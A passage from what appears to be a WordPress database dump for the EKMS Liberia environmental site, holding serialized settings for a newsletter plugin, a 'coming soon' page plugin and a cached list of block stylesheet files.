policy\";s:13:\"list_1_forced\";i:0;s:13:\"list_2_forced\";i:0;s:13:\"list_3_forced\";i:0;s:13:\"list_4_forced\";i:0;s:13:\"list_5_forced\";i:0;s:13:\"list_6_forced\";i:0;s:13:\"list_7_forced\";i:0;s:13:\"list_8_forced\";i:0;s:13:\"list_9_forced\";i:0;s:14:\"list_10_forced\";i:0;s:14:\"list_11_forced\";i:0;s:14:\"list_12_forced\";i:0;s:14:\"list_13_forced\";i:0;s:14:\"list_14_forced\";i:0;s:14:\"list_15_forced\";i:0;s:14:\"list_16_forced\";i:0;s:14:\"list_17_forced\";i:0;s:14:\"list_18_forced\";i:0;s:14:\"list_19_forced\";i:0;s:14:\"list_20_forced\";i:0;s:14:\"list_21_forced\";i:0;s:14:\"list_22_forced\";i:0;s:14:\"list_23_forced\";i:0;s:14:\"list_24_forced\";i:0;s:14:\"list_25_forced\";i:0;s:14:\"list_26_forced\";i:0;s:14:\"list_27_forced\";i:0;s:14:\"list_28_forced\";i:0;s:14:\"list_29_forced\";i:0;s:14:\"list_30_forced\";i:0;s:14:\"list_31_forced\";i:0;s:14:\"list_32_forced\";i:0;s:14:\"list_33_forced\";i:0;s:14:\"list_34_forced\";i:0;s:14:\"list_35_forced\";i:0;s:14:\"list_36_forced\";i:0;s:14:\"list_37_forced\";i:0;s:14:\"list_38_forced\";i:0;s:14:\"list_39_forced\";i:0;s:14:\"list_40_forced\";i:0;s:12:\"customfields\";a:0:{}s:5:\"lists\";a:0:{}s:13:\"lists_checked\";a:0:{}}s:15:\"newsletter_info\";a:18:{s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";}s:23:\"newsletter_install_time\";s:10:\"1575385711\";s:16:\"newsletter_lists\";a:120:{s:6:\"list_1\";s:0:\"\";s:13:\"list_1_status\";i:0;s:13:\"list_1_forced\";i:0;s:6:\"list_2\";s:0:\"\";s:13:\"list_2_status\";i:0;s:13:\"list_2_forced\";i:0;s:6:\"list_3\";s:0:\"\";s:13:\"list_3_status\";i:0;s:13:\"list_3_forced\";i:0;s:6:\"list_4\";s:0:\"\";s:13:\"list_4_status\";i:0;s:13:\"list_4_forced\";i:0;s:6:\"list_5\";s:0:\"\";s:13:\"list_5_status\";i:0;s:13:\"list_5_forced\";i:0;s:6:\"list_6\";s:0:\"\";s:13:\"list_6_status\";i:0;s:13:\"list_6_forced\";i:0;s:6:\"list_7\";s:0:\"\";s:13:\"list_7_status\";i:0;s:13:\"list_7_forced\";i:0;s:6:\"list_8\";s:0:\"\";s:13:\"list_8_status\";i:0;s:13:\"list_8_forced\";i:0;s:6:\"list_9\";s:0:\"\";s:13:\"list_9_status\";i:0;s:13:\"list_9_forced\";i:0;s:7:\"list_10\";s:0:\"\";s:14:\"list_10_status\";i:0;s:14:\"list_10_forced\";i:0;s:7:\"list_11\";s:0:\"\";s:14:\"list_11_status\";i:0;s:14:\"list_11_forced\";i:0;s:7:\"list_12\";s:0:\"\";s:14:\"list_12_status\";i:0;s:14:\"list_12_forced\";i:0;s:7:\"list_13\";s:0:\"\";s:14:\"list_13_status\";i:0;s:14:\"list_13_forced\";i:0;s:7:\"list_14\";s:0:\"\";s:14:\"list_14_status\";i:0;s:14:\"list_14_forced\";i:0;s:7:\"list_15\";s:0:\"\";s:14:\"list_15_status\";i:0;s:14:\"list_15_forced\";i:0;s:7:\"list_16\";s:0:\"\";s:14:\"list_16_status\";i:0;s:14:\"list_16_forced\";i:0;s:7:\"list_17\";s:0:\"\";s:14:\"list_17_status\";i:0;s:14:\"list_17_forced\";i:0;s:7:\"list_18\";s:0:\"\";s:14:\"list_18_status\";i:0;s:14:\"list_18_forced\";i:0;s:7:\"list_19\";s:0:\"\";s:14:\"list_19_status\";i:0;s:14:\"list_19_forced\";i:0;s:7:\"list_20\";s:0:\"\";s:14:\"list_20_status\";i:0;s:14:\"list_20_forced\";i:0;s:7:\"list_21\";s:0:\"\";s:14:\"list_21_status\";i:0;s:14:\"list_21_forced\";i:0;s:7:\"list_22\";s:0:\"\";s:14:\"list_22_status\";i:0;s:14:\"list_22_forced\";i:0;s:7:\"list_23\";s:0:\"\";s:14:\"list_23_status\";i:0;s:14:\"list_23_forced\";i:0;s:7:\"list_24\";s:0:\"\";s:14:\"list_24_status\";i:0;s:14:\"list_24_forced\";i:0;s:7:\"list_25\";s:0:\"\";s:14:\"list_25_status\";i:0;s:14:\"list_25_forced\";i:0;s:7:\"list_26\";s:0:\"\";s:14:\"list_26_status\";i:0;s:14:\"list_26_forced\";i:0;s:7:\"list_27\";s:0:\"\";s:14:\"list_27_status\";i:0;s:14:\"list_27_forced\";i:0;s:7:\"list_28\";s:0:\"\";s:14:\"list_28_status\";i:0;s:14:\"list_28_forced\";i:0;s:7:\"list_29\";s:0:\"\";s:14:\"list_29_status\";i:0;s:14:\"list_29_forced\";i:0;s:7:\"list_30\";s:0:\"\";s:14:\"list_30_status\";i:0;s:14:\"list_30_forced\";i:0;s:7:\"list_31\";s:0:\"\";s:14:\"list_31_status\";i:0;s:14:\"list_31_forced\";i:0;s:7:\"list_32\";s:0:\"\";s:14:\"list_32_status\";i:0;s:14:\"list_32_forced\";i:0;s:7:\"list_33\";s:0:\"\";s:14:\"list_33_status\";i:0;s:14:\"list_33_forced\";i:0;s:7:\"list_34\";s:0:\"\";s:14:\"list_34_status\";i:0;s:14:\"list_34_forced\";i:0;s:7:\"list_35\";s:0:\"\";s:14:\"list_35_status\";i:0;s:14:\"list_35_forced\";i:0;s:7:\"list_36\";s:0:\"\";s:14:\"list_36_status\";i:0;s:14:\"list_36_forced\";i:0;s:7:\"list_37\";s:0:\"\";s:14:\"list_37_status\";i:0;s:14:\"list_37_forced\";i:0;s:7:\"list_38\";s:0:\"\";s:14:\"list_38_status\";i:0;s:14:\"list_38_forced\";i:0;s:7:\"list_39\";s:0:\"\";s:14:\"list_39_status\";i:0;s:14:\"list_39_forced\";i:0;s:7:\"list_40\";s:0:\"\";s:14:\"list_40_status\";i:0;s:14:\"list_40_forced\";i:0;}s:20:\"newsletter_log_level\";s:1:\"0\";s:24:\"newsletter_logger_secret\";s:8:\"dc01b950\";s:15:\"newsletter_main\";a:37:{s:11:\"return_path\";b:0;s:8:\"reply_to\";b:0;s:12:\"sender_email\";s:24:\"contact@ekmsliberia.info\";s:11:\"sender_name\";s:23:\"Liberia EKMS Newsletter\";s:6:\"editor\";i:0;s:13:\"scheduler_max\";s:5:\"10000\";s:9:\"phpmailer\";i:0;s:5:\"debug\";s:1:\"0\";s:5:\"track\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:12:\"css_disabled\";s:1:\"0\";s:2:\"ip\";s:0:\"\";s:4:\"page\";s:4:\"2904\";s:19:\"disable_cron_notice\";i:0;s:13:\"do_shortcodes\";s:1:\"0\";s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";s:12:\"contract_key\";s:0:\"\";s:9:\"log_level\";s:1:\"0\";s:25:\"content_transfer_encoding\";s:0:\"\";s:5:\"roles\";a:0:{}}s:15:\"newsletter_page\";s:4:\"2904\";s:18:\"newsletter_profile\";a:10:{s:4:\"text\";s:188:\"{profile_form}\n    <p>If you change your email address, a confirmation email will be sent to activate it.</p>\n    <p><a href=\"{unsubscription_confirm_url}\">Cancel your subscription</a></p>\";s:13:\"email_changed\";s:81:\"Your email has been changed, an activation email has been sent with instructions.\";s:5:\"error\";s:42:\"Your email is not valid or already in use.\";s:10:\"save_label\";s:4:\"Save\";s:13:\"privacy_label\";s:21:\"Read our privacy note\";s:5:\"saved\";s:14:\"Profile saved.\";s:18:\"export_newsletters\";i:0;s:3:\"url\";s:0:\"\";s:5:\"lists\";a:0:{}s:12:\"customfields\";a:0:{}}s:21:\"newsletter_statistics\";a:1:{s:3:\"key\";s:32:\"3e00f6b7ad514de0ee66dbc9f56651eb\";}s:23:\"newsletter_subscription\";a:18:{s:14:\"noconfirmation\";s:1:\"1\";s:12:\"notify_email\";s:24:\"contact@ekmsliberia.info\";s:8:\"multiple\";s:1:\"0\";s:6:\"notify\";s:1:\"0\";s:10:\"error_text\";s:102:\"<p>You cannot subscribe with the email address you entered, please contact the site administrator.</p>\";s:17:\"subscription_text\";s:26:\"<p>{subscription_form}</p>\";s:17:\"confirmation_text\";s:104:\"<p>A confirmation email is on the way. Follow the instructions and check the spam folder. Thank you.</p>\";s:20:\"confirmation_subject\";s:32:\"Please confirm your subscription\";s:21:\"confirmation_tracking\";s:0:\"\";s:20:\"confirmation_message\";s:94:\"<p>Please confirm your subscription <a href=\"{subscription_confirm_url}\">clicking here</a></p>\";s:14:\"confirmed_text\";s:43:\"<p>Your subscription has been confirmed</p>\";s:17:\"confirmed_subject\";s:7:\"Welcome\";s:17:\"confirmed_message\";s:140:\"<p>This message confirms your subscription to our newsletter. Thank you!</p>\r\n<hr />\r\n<p><a href=\"{profile_url}\">Change your profile</a></p>\";s:18:\"confirmed_tracking\";s:0:\"\";s:14:\"optin_override\";s:1:\"0\";s:16:\"confirmation_url\";s:0:\"\";s:13:\"confirmed_url\";s:0:\"\";s:18:\"confirmed_disabled\";s:1:\"0\";}s:17:\"newsletter_system\";a:0:{}s:19:\"newsletter_template\";a:1:{s:8:\"template\";s:2365:\"<!DOCTYPE html>\n<html>\n    <head>\n        <!-- General styles, not used by all email clients -->\n        <style type=\"text/css\" media=\"all\">\n            a {\n                text-decoration: none;\n                color: #0088cc;\n            }\n            hr {\n                border-top: 1px solid #999;\n            }\n        </style>\n    </head>\n\n    <!-- KEEP THE LAYOUT SIMPLE: THOSE ARE SERVICE MESSAGES. -->\n    <body style=\"margin: 0; padding: 0;\">\n\n        <!-- Top title with dark background -->\n        <table style=\"background-color: #444; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\n            <tr>\n                <td style=\"padding: 20px; text-align: center; font-family: sans-serif; color: #fff; font-size: 28px\">\n                    {blog_title}\n                </td>\n            </tr>\n        </table>\n\n        <!-- Main table 100% wide with background color #eee -->    \n        <table style=\"background-color: #eee; width: 100%;\">\n            <tr>\n                <td align=\"center\" style=\"padding: 15px;\">\n\n                    <!-- Content table with backgdound color #fff, width 500px -->\n                    <table style=\"background-color: #fff; max-width: 600px; width: 100%; border: 1px solid #ddd;\">\n                        <tr>\n                            <td style=\"padding: 15px; color: #333; font-size: 16px; font-family: sans-serif\">\n                                <!-- The \"message\" tag below is replaced with one of confirmation, welcome or goodbye messages -->\n                                <!-- Messages content can be configured on Newsletter List Building panels --> \n\n                                {message}\n\n                                <hr>\n                                <!-- Signature if not already added to single messages (surround with <p>) -->\n                                <p>\n                                    <small>\n                                        <a href=\"{blog_url}\">{blog_url}</a><br>\n                                        {company_name}<br>\n                                        {company_address}\n                                    </small>\n                                </p>\n                                \n\n                            </td>\n                        </tr>\n                    </table>\n\n                </td>\n            </tr>\n        </table>\n\n    </body>\n</html>\";}s:25:\"newsletter_unsubscription\";a:8:{s:16:\"unsubscribe_text\";s:103:\"<p>Please confirm you want to unsubscribe <a href=\"{unsubscription_confirm_url}\">clicking here</a>.</p>\";s:10:\"error_text\";s:99:\"<p>Subscriber not found, it probably has already been removed. No further actions are required.</p>\";s:17:\"unsubscribed_text\";s:124:\"<p>Your subscription has been deleted. If that was an error you can <a href=\"{reactivate_url}\">subscribe again here</a>.</p>\";s:20:\"unsubscribed_subject\";s:7:\"Goodbye\";s:20:\"unsubscribed_message\";s:87:\"<p>This message confirms that you have unsubscribed from our newsletter. Thank you.</p>\";s:16:\"reactivated_text\";s:46:\"<p>Your subscription has been reactivated.</p>\";s:6:\"notify\";s:0:\"\";s:12:\"notify_email\";s:0:\"\";}s:16:\"newsletter_users\";a:0:{}s:23:\"newsletter_users_search\";a:4:{s:11:\"search_text\";s:0:\"\";s:13:\"search_status\";s:0:\"\";s:11:\"search_list\";s:0:\"\";s:11:\"search_page\";i:0;}s:18:\"newsletter_version\";s:5:\"7.8.8\";}','no'),(3566830,'wpsm_rcs_plugin_options_dashboard','s:37:\"a:1:{s:15:\"wpsm_csp_status\";s:1:\"0\";}\";','yes'),(3566831,'wpsm_rcs_plugin_options_templates','s:30:\"a:1:{s:9:\"templates\";s:1:\"1\";}\";','yes'),(3566832,'wpsm_rcs_plugin_options_general','s:567:\"a:7:{s:13:\"rcsp_logo_url\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/wp.png\";s:10:\"logo_width\";s:3:\"110\";s:11:\"logo_height\";s:2:\"90\";s:11:\"logo_enable\";s:2:\"on\";s:13:\"rcsp_headline\";s:11:\"Coming Soon\";s:16:\"rcsp_description\";s:262:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent id dolor dui, dapibus gravida elit. Donec conseenigmat laore gittis. Suspendisse ultricies ultrices viverra. Morbi rhoncus laoreet tincidunt. Mauris interdum convallis metus. Suspendiss lacus est.\";s:17:\"home_sec_link_txt\";s:4:\"Home\";}\";','yes'),(3566833,'wpsm_rcs_plugin_options_header','s:188:\"a:4:{s:7:\"favicon\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/wp.png\";s:10:\"meta_title\";s:11:\"Coming Soon\";s:9:\"meta_desc\";s:0:\"\";s:9:\"google_al\";s:0:\"\";}\";','yes'),(3566834,'wpsm_rcs_plugin_options_countdown','s:215:\"a:7:{s:16:\"countdown_enable\";s:2:\"on\";s:14:\"countdown_date\";s:10:\"2025/02/02\";s:14:\"countdown_time\";s:5:\"10:50\";s:4:\"days\";s:4:\"Days\";s:5:\"hours\";s:5:\"Hours\";s:7:\"minutes\";s:7:\"Minutes\";s:7:\"seconds\";s:7:\"Seconds\";}\";','yes'),(3566835,'wpsm_rcs_plugin_options_background','s:851:\"a:11:{s:17:\"select_background\";s:8:\"bg_image\";s:16:\"background_color\";s:7:\"#31a3dd\";s:9:\"bg_effect\";s:3:\"off\";s:24:\"background_color_overlay\";s:1:\"1\";s:16:\"background_image\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";s:15:\"bg_slideshow_no\";s:1:\"2\";s:19:\"background_slides_0\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";s:19:\"background_slides_1\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";s:19:\"background_slides_2\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";s:19:\"background_slides_3\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";s:19:\"background_slides_4\";s:77:\"https://ekmsliberia.info/wp-content/plugins/responsive-coming-soon/img/bg.jpg\";}\";','yes'),(3566836,'wpsm_rcs_plugin_options_text_and_color','s:503:\"a:14:{s:16:\"headeline_ft_clr\";s:7:\"#ffffff\";s:11:\"desc_ft_clr\";s:7:\"#ffffff\";s:13:\"sb_btn_ft_clr\";s:7:\"#ffffff\";s:13:\"sb_btn_bg_clr\";s:7:\"#16c9d0\";s:13:\"cnd_timer_clr\";s:7:\"#ffffff\";s:15:\"social_icon_clr\";s:7:\"#333333\";s:18:\"social_icon_bg_clr\";s:7:\"#ffffff\";s:10:\"ext_ft_clr\";s:7:\"#ffffff\";s:10:\"ext_bg_clr\";s:7:\"#16c9d0\";s:16:\"headline_ft_size\";s:2:\"65\";s:12:\"desc_ft_size\";s:2:\"20\";s:16:\"headlines_ft_stl\";s:10:\"sans-serif\";s:11:\"desc_ft_stl\";s:10:\"sans-serif\";s:12:\"other_ft_stl\";s:10:\"sans-serif\";}\";','yes'),(3566837,'wpsm_rcs_plugin_options_custom_css','s:31:\"a:1:{s:10:\"custom_css\";s:0:\"\";}\";','yes'),(3566838,'wpsm_rcs_plugin_options_social','s:406:\"a:3:{s:6:\"social\";a:6:{i:0;s:1:\"#\";i:1;s:1:\"#\";i:2;s:1:\"#\";i:3;s:1:\"#\";i:4;s:1:\"#\";i:5;s:1:\"#\";}s:11:\"social_icon\";a:6:{i:0;s:11:\"fa-facebook\";i:1;s:10:\"fa-twitter\";i:2;s:11:\"fa-linkedin\";i:3;s:12:\"fa-instagram\";i:4;s:15:\"fa-youtube-play\";i:5;s:14:\"fa-pinterest-p\";}s:11:\"social_name\";a:6:{i:0;s:8:\"facebook\";i:1;s:7:\"twitter\";i:2;s:8:\"linkedin\";i:3;s:9:\"instagram\";i:4;s:7:\"youtube\";i:5;s:9:\"pinterest\";}}\";','yes'),(3566839,'wpsm_rcs_plugin_options_about_us','s:415:\"a:4:{s:15:\"about_us_enable\";s:2:\"on\";s:15:\"about_btn_label\";s:8:\"About Us\";s:19:\"about_section_title\";s:8:\"About Us\";s:18:\"about_section_desc\";s:262:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent id dolor dui, dapibus gravida elit. Donec conseenigmat laore gittis. Suspendisse ultricies ultrices viverra. Morbi rhoncus laoreet tincidunt. Mauris interdum convallis metus. Suspendiss lacus est.\";}\";','yes'),(3566840,'wpsm_rcs_plugin_options_contact_us','s:524:\"a:7:{s:17:\"contact_us_enable\";s:2:\"on\";s:28:\"contact_us_section_btn_label\";s:7:\"Contact\";s:24:\"contact_us_section_title\";s:12:\"Contact Info\";s:29:\"contact_us_section_title_desc\";s:174:\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Praesent id dolor dui, dapibus gravida elit. Donec conseenigmat laore gittis. Suspendisse ultricies ultrices viverra.\";s:20:\"contact_info_address\";s:16:\"123 Street, City\";s:19:\"contact_info_number\";s:16:\"(00) 123-4567890\";s:26:\"contact_info_email_address\";s:17:\"email@example.com\";}\";','yes'),(3566841,'wpsm_rcs_plugin_options_newsletter','s:363:\"a:6:{s:28:\"wpsm_rcs_newsletter_dropdown\";s:1:\"0\";s:16:\"to_subs_mail_sub\";s:16:\"Coming soon page\";s:16:\"to_subs_mail_msg\";s:67:\"Thanks for submitting your email. We will notify you once we launch\";s:17:\"to_admin_mail_sub\";s:16:\"Coming soon page\";s:17:\"to_admin_mail_msg\";s:51:\"Hey Some one has subscribed to the Coming Soon page\";s:18:\"email_add_of_admin\";s:0:\"\";}\";','yes'),(3566842,'wpsm_rcs_plugin_options_subscription_field','s:459:\"a:7:{s:36:\"subscription_field_link_button_label\";s:9:\"Subscribe\";s:32:\"subscription_field_section_title\";s:10:\"Newsletter\";s:31:\"subscription_field_section_desc\";s:27:\"subscribe to our newsletter\";s:24:\"email_field_pl_hold_text\";s:16:\"Enter Your Email\";s:20:\"subs_me_button_label\";s:9:\"Notify Me\";s:30:\"success_subs_notification_text\";s:28:\"Thank you for subscribing Us\";s:31:\"invalid_email_notification_text\";s:40:\"Invalid Email , Please enter valid Email\";}\";','yes'),(3566856,'wpsm_rcs_review','a:2:{s:4:\"time\";i:1708000038;s:9:\"dismissed\";b:0;}','yes'),(3567806,'wp_attachment_pages_enabled','1','yes'),(4608993,'tidio-lyro-ai-chatbot-notice','1','yes'),(4609026,'pods_framework_version_last','3.0.10','yes'),(4609027,'pods_framework_version','3.2.8.2','yes'),(4609028,'pods_framework_db_version','2.3.5','yes'),(4660917,'iclcat_255','a:0:{}','yes'),(4743122,'category_children','a:0:{}','yes'),(5019464,'iclcat_257','a:0:{}','yes'),(5038107,'iclcat_258','a:0:{}','yes'),(5038112,'iclcat_259','a:0:{}','yes'),(5543972,'resource_category_children','a:0:{}','auto'),(5144131,'iclcat_260','a:0:{}','yes'),(5144132,'resource_tag_children','a:0:{}','yes'),(5301274,'_transient_wp_core_block_css_files','a:2:{s:7:\"version\";s:5:\"6.9.4\";s:5:\"files\";a:584:{i:0;s:31:\"accordion-heading/style-rtl.css\";i:1;s:35:\"accordion-heading/style-rtl.min.css\";i:2;s:27:\"accordion-heading/style.css\";i:3;s:31:\"accordion-heading/style.min.css\";i:4;s:28:\"accordion-item/style-rtl.css\";i:5;s:32:\"accordion-item/style-rtl.min.css\";i:6;s:24:\"accordion-item/style.css\";i:7;s:28:\"accordion-item/style.min.css\";i:8;s:29:\"accordion-panel/style-rtl.css\";i:9;s:33:\"accordion-panel/style-rtl.min.css\";i:10;s:25:\"accordion-panel/style.css\";i:11;s:29:\"accordion-panel/style.min.css\";i:12;s:23:\"accordion/style-rtl.css\";i:13;s:27:\"accordion/style-rtl.min.css\";i:14;s:19:\"accordion/style.css\";i:15;s:23:\"accordion/style.min.css\";i:16;s:23:\"archives/editor-rtl.css\";i:17;s:27:\"archives/editor-rtl.min.css\";i:18;s:19:\"archives/editor.css\";i:19;s:23:\"archives/editor.min.css\";i:20;s:22:\"archives/style-rtl.css\";i:21;s:26:\"archives/style-rtl.min.css\";i:22;s:18:\"archives/style.css\";i:23;s:22:\"archives/style.min.css\";i:24;s:20:\"audio/editor-rtl.css\";i:25;s:24:\"audio/editor-rtl.min.css\";i:26;s:16:\"audio/editor.css\";i:27;s:20:\"audio/editor.min.css\";i:28;s:19:\"audio/style-rtl.css\";i:29;s:23:\"audio/style-rtl.min.css\";i:30;s:15:\"audio/style.css\";i:31;s:19:\"audio/style.min.css\";i:32;s:19:\"audio/theme-rtl.css\";i:33;s:23:\"audio/theme-rtl.min.css\";i:34;s:15:\"audio/theme.css\";i:35;s:19:\"audio/theme.min.css\";i:36;s:21:\"avatar/editor-rtl.css\";i:37;s:25:\"avatar/editor-rtl.min.css\";i:38;s:17:\"avatar/editor.css\";i:39;s:21:\"avatar/editor.min.css\";i:40;s:20:\"avatar/style-rtl.css\";i:41;s:24:\"avatar/style-rtl.min.css\";i:42;s:16:\"avatar/style.css\";i:43;s:20:\"avatar/style.min.css\";i:44;s:21:\"button/editor-rtl.css\";i:45;s:25:\"button/editor-rtl.min.css\";i:46;s:17:\"button/editor.css\";i:47;s:21:\"button/editor.min.css\";i:48;s:20:\"button/style-rtl.css\";i:49;s:24:\"button/style-rtl.min.css\";i:50;s:16:\"button/style.css\";i:51;s:20:\"button/style.min.css\";i:52;s:22:\"buttons/editor-rtl.css\";i:53;s:26:\"buttons/editor-rtl.min.css\";i:54;s:18:\"buttons/editor.css\";i:55;s:22:\"buttons/editor.min.css\";i:56;s:21:\"buttons/style-rtl.css\";i:57;s:25:\"buttons/style-rtl.min.css\";i:58;s:17:\"buttons/style.css\";i:59;s:21:\"buttons/style.min.css\";i:60;s:22:\"calendar/style-rtl.css\";i:61;s:26:\"calendar/style-rtl.min.css\";i:62;s:18:\"calendar/style.css\";i:63;s:22:\"calendar/style.min.css\";i:64;s:25:\"categories/editor-rtl.css\";i:65;s:29:\"categories/editor-rtl.min.css\";i:66;s:21:\"categories/editor.css\";i:67;s:25:\"categories/editor.min.css\";i:68;s:24:\"categories/style-rtl.css\";i:69;s:28:\"categories/style-rtl.min.css\";i:70;s:20:\"categories/style.css\";i:71;s:24:\"categories/style.min.css\";i:72;s:19:\"code/editor-rtl.css\";i:73;s:23:\"code/editor-rtl.min.css\";i:74;s:15:\"code/editor.css\";i:75;s:19:\"code/editor.min.css\";i:76;s:18:\"code/style-rtl.css\";i:77;s:22:\"code/style-rtl.min.css\";i:78;s:14:\"code/style.css\";i:79;s:18:\"code/style.min.css\";i:80;s:18:\"code/theme-rtl.css\";i:81;s:22:\"code/theme-rtl.min.css\";i:82;s:14:\"code/theme.css\";i:83;s:18:\"code/theme.min.css\";i:84;s:22:\"columns/editor-rtl.css\";i:85;s:26:\"columns/editor-rtl.min.css\";i:86;s:18:\"columns/editor.css\";i:87;s:22:\"columns/editor.min.css\";i:88;s:21:\"columns/style-rtl.css\";i:89;s:25:\"columns/style-rtl.min.css\";i:90;s:17:\"columns/style.css\";i:91;s:21:\"columns/style.min.css\";i:92;s:33:\"comment-author-name/style-rtl.css\";i:93;s:37:\"comment-author-name/style-rtl.min.css\";i:94;s:29:\"comment-author-name/style.css\";i:95;s:33:\"comment-author-name/style.min.css\";i:96;s:29:\"comment-content/style-rtl.css\";i:97;s:33:\"comment-content/style-rtl.min.css\";i:98;s:25:\"comment-content/style.css\";i:99;s:29:\"comment-content/style.min.css\";i:100;s:26:\"comment-date/style-rtl.css\";i:101;s:30:\"comment-date/style-rtl.min.css\";i:102;s:22:\"comment-date/style.css\";i:103;s:26:\"comment-date/style.min.css\";i:104;s:31:\"comment-edit-link/style-rtl.css\";i:105;s:35:\"comment-edit-link/style-rtl.min.css\";i:106;s:27:\"comment-edit-link/style.css\";i:107;s:31:\"comment-edit-link/style.min.css\";i:108;s:32:\"comment-reply-link/style-rtl.css\";i:109;s:36:\"comment-reply-link/style-rtl.min.css\";i:110;s:28:\"comment-reply-link/style.css\";i:111;s:32:\"comment-reply-link/style.min.css\";i:112;s:30:\"comment-template/style-rtl.css\";i:113;s:34:\"comment-template/style-rtl.min.css\";i:114;s:26:\"comment-template/style.css\";i:115;s:30:\"comment-template/style.min.css\";i:116;s:42:\"comments-pagination-numbers/editor-rtl.css\";i:117;s:46:\"comments-pagination-numbers/editor-rtl.min.css\";i:118;s:38:\"comments-pagination-numbers/editor.css\";i:119;s:42:\"comments-pagination-numbers/editor.min.css\";i:120;s:34:\"comments-pagination/editor-rtl.css\";i:121;s:38:\"comments-pagination/editor-rtl.min.css\";i:122;s:30:\"comments-pagination/editor.css\";i:123;s:34:\"comments-pagination/editor.min.css\";i:124;s:33:\"comments-pagination/style-rtl.css\";i:125;s:37:\"comments-pagination/style-rtl.min.css\";i:126;s:29:\"comments-pagination/style.css\";i:127;s:33:\"comments-pagination/style.min.css\";i:128;s:29:\"comments-title/editor-rtl.css\";i:129;s:33:\"comments-title/editor-rtl.min.css\";i:130;s:25:\"comments-title/editor.css\";i:131;s:29:\"comments-title/editor.min.css\";i:132;s:23:\"comments/editor-rtl.css\";i:133;s:27:\"comments/editor-rtl.min.css\";i:134;s:19:\"comments/editor.css\";i:135;s:23:\"comments/editor.min.css\";i:136;s:22:\"comments/style-rtl.css\";i:137;s:26:\"comments/style-rtl.min.css\";i:138;s:18:\"comments/style.css\";i:139;s:22:\"comments/style.min.css\";i:140;s:20:\"cover/editor-rtl.css\";i:141;s:24:\"cover/editor-rtl.min.css\";i:142;s:16:\"cover/editor.css\";i:143;s:20:\"cover/editor.min.css\";i:144;s:19:\"cover/style-rtl.css\";i:145;s:23:\"cover/style-rtl.min.css\";i:146;s:15:\"cover/style.css\";i:147;s:19:\"cover/style.min.css\";i:148;s:22:\"details/editor-rtl.css\";i:149;s:26:\"details/editor-rtl.min.css\";i:150;s:18:\"details/editor.css\";i:151;s:22:\"details/editor.min.css\";i:152;s:21:\"details/style-rtl.css\";i:153;s:25:\"details/style-rtl.min.css\";i:154;s:17:\"details/style.css\";i:155;s:21:\"details/style.min.css\";i:156;s:20:\"embed/editor-rtl.css\";i:157;s:24:\"embed/editor-rtl.min.css\";i:158;s:16:\"embed/editor.css\";i:159;s:20:\"embed/editor.min.css\";i:160;s:19:\"embed/style-rtl.css\";i:161;s:23:\"embed/style-rtl.min.css\";i:162;s:15:\"embed/style.css\";i:163;s:19:\"embed/style.min.css\";i:164;s:19:\"embed/theme-rtl.css\";i:165;s:23:\"embed/theme-rtl.min.css\";i:166;s:15:\"embed/theme.css\";i:167;s:19:\"embed/theme.min.css\";i:168;s:19:\"file/editor-rtl.css\";i:169;s:23:\"file/editor-rtl.min.css\";i:170;s:15:\"file/editor.css\";i:171;s:19:\"file/editor.min.css\";i:172;s:18:\"file/style-rtl.css\";i:173;s:22:\"file/style-rtl.min.css\";i:174;s:14:\"file/style.css\";i:175;s:18:\"file/style.min.css\";i:176;s:23:\"footnotes/style-rtl.css\";i:177;s:27:\"footnotes/style-rtl.min.css\";i:178;s:19:\"footnotes/style.css\";i:179;s:23:\"footnotes/style.min.css\";i:180;s:23:\"freeform/editor-rtl.css\";i:181;s:27:\"freeform/editor-rtl.min.css\";i:182;s:19:\"freeform/editor.cs